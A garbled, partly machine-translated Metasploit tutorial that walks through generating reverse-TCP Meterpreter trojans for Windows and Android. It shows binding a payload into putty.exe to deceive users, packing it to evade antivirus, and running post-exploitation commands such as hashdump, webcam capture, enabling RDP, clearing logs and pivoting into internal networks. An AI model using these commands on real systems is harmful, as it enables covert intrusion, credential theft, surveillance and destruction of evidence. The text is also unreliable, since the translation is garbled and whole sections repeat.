Metasploit Getting Started Tutorial

0.Metasploit Profile

Metasploit is an open source penetration testing framework platform, so far, msf has built thousands of disclosed vulnerabilities related modules and penetration testing tools, modules ruby ​​language, which allows the user to the module as needed with appropriate modifications, even calling himself wrote the test module. After the attack module requires the use of selected, you only need to use simple commands to configure some parameters can be done for a test and exploit vulnerabilities, the penetration process automation, simplification.

1.Metasploit installation

Windows Platform

First, download the installer from the official website:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
Default Port: 3650

After closing the anti-virus software as an administrator to run the installer, the installation process will be included with installation PostgreSQL database for storing metasploit index within each module, such as load, speed up the search

After installation, the desktop shortcut to generate Metasploit, right to run as Administrator cmd to open and run Metasploit Console

Metasploit long time to load when you start Windows, the absence of reaction please wait 3-5 minutes

On the Windows platform, Metasploit also provides Web access interface to achieve operational graphical

Linux platform

Acquired from github

git clone https://github.com/rapid7/metasploit-framework.git

Switch to metasploit-framework directory, and execute permissions given msfconsol start
cd metasploit-framework && chmod + x msfconsole && ./msfconsole

Using the following command to download a program key installation, particularly where the network installation progress again

cd /opt &&  curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall

Kali Linux comes with Metasploit penetration tool and automation Armitage

Android platform

When Andrews install Metasploit is actually installed on a linux Andrews subsystem, and then install Metasploit On this basis, although the process is complex and cumbersome, but penetration measured in an enterprise network environment, carrying a laptop may access the network would be too conspicuous, installed on Android phone or tablet Metasploit this case may well be an option

Prerequisite: Android phone or tablet need root privileges

Usually choose to install Termux as the basic environment, the system will start to download things, the specific time depending on the network environment of varying lengths, so you can choose to take a nap or something at this time =. = #

Termux use apt package manager, execute the following command updates

apt-get update && apt-get upgrade -y && apt dist-upgrade -y

And said next installation Metasploit linux platform to install the same

2. Use the Metasploit penetration testing

Introduction to commonly used commands at Terminal msf

msfdb init                              msf数据库初始化
apt install metasploit framework        msf更新
msfVENOM                                多平台攻击载荷生成器
msf-nasm_shell                          将汇编指令转换成为对应的16进制机器码
msfconsole                              打开msf终端

Introduction to commonly used commands at the terminal msf

db_status           查看数msf据库连接状态,连接数据库能够优化搜索等过程

db_rebuild_cache    重建缓存，将模块等索引重新存入数据库

db_nmap             调用nmap扫描，并将扫描结果存入数据库

help [db_connect]   显示命令的帮助信息

search [module]     搜索含有关键字的模块

use [module]        选择使用一个模块(以ms17_010永恒之蓝为例)

show payload        显示该模块支持的payload

show options        显示该模块需要设置的参数(其中required为no的表示不是必须的参数)

info                如果觉得show命令显示的不够完整可以直接输入info查看详细详细

set [opt]           使用模块后，设置模块所需要的参数的值(对应使用unset取消设置的值)

setg [opt]          设置全局参数，对于ip之类的参数可以设置为全局，当切换模块后就不需要再次设置ip参数(对应使用unsetg取消设置)

back                返回上级状态

exploit/run         两个命令都表示运行攻击模块

sessions            查看当前连接的会话

3. Use msfvenom generate Trojan file

t payload on the selection of, for various reasons such as firewall, may limit the external network access on the target host some of the internal network port, or even just some ports open and then close all other ports. In this case, the target host back to even allow an attacker to be a better option, this model is equivalent to a target host to make their external connection request is a normal flow, so you can bypass the security settings, so use a popular choice when selecting reverse band payload payload.

Usually 32 using windows / meterpreter_reverse_tcp and 64 using windows / x64 / meterpreter_reverse_tcp. Of course, still need to select different loads according to different needs
to view available loads / encoder / nops / all lists

msfvenom -l payload/encoders/nops/all

View Trojan file format that can be generated using the -f format specified Trojan

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe

Trojan generated Andrews

msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk

msf terminal monitors will not even answer

use exploit/multi/handler           该模块用于接收回连会话，一般只需要设置监听主机和端口号

4. Trojan free to kill

Mixed use multiple encoders for multiple coding
is not recommended, to avoid killing rate, long encoding time, and the resulting situation after the Trojans might not run or run can not connect back to the end of the attack will be
"-f raw" represents the generation of the original Trojan this pipeline generated by the Trojans need only continue to pass, so only need to specify the format generated in the last command, and before that should be used raw original Trojan

Bundled into a normal file
recommended, bundling enables users to relax their vigilance after the Trojans to a normal file, in real life, we should pay attention than the hash value of the file with the official's
choice of binding targets, it may not run after bundling appear case, in this case try to use the encoder, or the replacement target binding, by way of example herein to putty

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe

Packers
recommended, packers technology to circumvent the soft kill detect a certain extent, used here upx packers on linux commonly used, for example, packed, there are many tools on the windows, can choose
upx -5 backdoor_raw.elf -5 indicates compression level (1-9), detailed reference upx -h command
above method using a comprehensive
attach a Trojan online testing site: http://www.virscan.org/

Bundled into a normal file
recommended, bundling enables users to relax their vigilance after the Trojans to a normal file, in real life, we should pay attention than the hash value of the file with the official's
choice of binding targets, it may not run after bundling appear case, in this case try to use the encoder, or the replacement target binding, by way of example herein to putty

Packers
recommended, packers technology to circumvent the soft kill detect a certain extent, used here upx packers on linux commonly used, for example, packed, there are many tools on the windows, can choose
upx -5 backdoor_raw.elf -5 indicates compression level (1-9), detailed reference upx -h command
above method using a comprehensive
attach a Trojan online testing site: http://www.virscan.org/

After 5.meterpreter use penetration

By exploit / multi / handler monitor module, and to establish a connection with the target host, can be performed using an osmotic using the meterpreter

pwd                 打印当前工作目录

sysinfo             查看系统信息

ps                  查看当前目标机上运行的进程列表和pid

webcam_snap         调用相机拍摄照片(使用webcam_stream能够通过浏览器模拟录像机，实现实时监控)

run vnc             运行vnc远程查看屏幕(run screen_unlock实现远程控制)

run post/windows/manage/enable_rdp          如果目标主机是windows系统，使用该命令开启目标的远程桌面3389

screenshot          截取目标主机当前屏幕

getuid              获取当前权限的用户id

getsystem           获取system权限

hashdump            获取用户名与hash口令

shell               获取目标主机shell(windows环境下中文乱码的解决办法:chcp 65001

Ctrl+Z              退出shell模式，返回到meterpreter

upload              上传一个文件

download            下载一个文件

excute              执行目标系统中的文件(-f 指定文件，-i执行可交互模式，-H隐藏窗口)

clearev             清除日志

background          将Meterpreter放入后台(使用session -i重新连接到会话)

6.Meterpreter carried out within the network penetration Profile

During infiltration, when you can get permission to connect to the host of a public network of units, which hosts may also be connected with an internal local area network, and other hosts within the LAN does not have permission to access the outside. This is a very common LAN mode, usually within a few hosts can not connect outside the network can store some sensitive documents, and can now be controlled by the host that as a springboard for an attacker to access internal network, for the implementation of internal penetration network
routing within the network to add reach

run get_local_subnets                   获取目标主机上的子网状态，其中192.168.16.0和攻击机在同一个网段，169.254.0.0是vritualbox的内部网卡模式

run autoroute -s 169.254.0.0/16 1        使用autoroute模块添加到达内网的路由经session 1转发

run autoroute -p                         查看当前的路由表，可以看到发往169.254.0.0网段的流量都将通过session 1转发

接下来就可以在msf下使用db_nmap扫描内网存活主机，针对内网的开放端口进行攻击
portfwd端口转发
端口转发能够将内网端口转发到本地主机的端口，相当于virtualbox的端口映射功能。
portfwd -h                                          查看帮助信息

portfwd add -l 7070 -r 192.168.16.59 -p 3389        将目标主机192.168.16.59的3389转发到本地主机的7070端口

rdesktop 127.0.0.1:7070                             端口转发成功后就可以从本地端口连接rdp

Reference books "Metasploit The Penetration Tester's Guide." "Metasploit Penetration Testing Guide (Revised Edition)"